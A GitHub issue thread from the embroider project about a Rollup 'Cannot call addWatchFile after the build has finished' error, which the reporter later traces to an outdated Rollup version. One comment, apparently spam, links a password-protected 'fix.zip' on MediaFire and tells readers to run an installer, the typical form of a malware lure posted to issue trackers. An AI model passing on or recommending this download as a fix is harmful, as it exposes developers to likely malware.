### ISSUE TITLE
[addon-dev@v5] Cannot call "addWatchFile" after the build has finished.

### ISSUE THREAD

**Issue by simonihmig** [embroider-build/embroider#2081]
Running into this error on a large repo building a ton of v2 addons. It is not happening everywhere, rather rarely, so maybe some kind of race condition?

Stack trace (anonymized):
```
(plugin copy-assets) RollupError: Cannot call "addWatchFile" after the build has finished.
at error (/xxx/somepackage/node_modules/rollup/dist/shared/rollup.js:353:30)
at Object.error (/xxx/somepackage/node_modules/rollup/dist/shared/rollup.js:1721:20)
at Object.addWatchFile (/xxx/somepackage/node_modules/rollup/dist/shared/rollup.js:1713:29)
at Object.generateBundle (/xxx/node_modules/@embroider/addon-dev/src/rollup-keep-assets.ts:41:14)
at /xxx/somepackage/node_modules/rollup/dist/shared/rollup.js:1914:40
```

Likely related to https://github.com/embroider-build/embroider/pull/2007 /cc @vstefanovic97

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by simonihmig** [comment]
Nvm, this was due to being on an older rollup version. Missed the [discussion here](https://github.com/embroider-build/embroider/pull/2007#discussion_r1654484138), and the new peer dependency. (we have so many peer dependency issues 😅 )
